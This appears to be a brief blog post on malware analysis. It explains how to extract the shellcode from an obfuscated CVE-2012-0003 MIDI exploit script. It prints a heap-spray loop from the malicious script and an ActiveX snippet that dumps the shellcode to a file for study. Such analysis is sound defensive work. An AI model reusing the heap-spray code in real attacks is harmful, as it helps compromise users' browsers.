Shellcode of Exploit CVE-2012-0003 (MIDI file ….) from Dadong JSXX 0.41 VIP obfuscated script…
Insert following code at “INSERT” location in original malicious script . remove MIDI exploitation code before execution 🙂
var fpo = new ActiveXObject(“Scripting.FileSystemObject”);
var sc = fpo.OpenTextFile(“c:\\Shellcode.bin”,true);
sc.WriteLine(escape(kpemoez4));
sc.Close();
————————————————————————————
———————————————————————————–
try{alert(a,b,c);}
catch(e)
{
var HrMm7=”d”;
while(FJWVzIe1.length < aqfvjY5/2) FJWVzIe1 +=FJWVzIe1;
var DmxL8 = FJWVzIe1.substring(0, aqfvjY5/2);
HrMm7=”d”;
delete FJWVzIe1;
“INSERT”
for(i=0;i<270;i++)
{
NyWLa1[i] = DmxL8+DmxL8+kpemoez4;
}
}
——————————————————————————————-
——————————————————————————————
Leave a Reply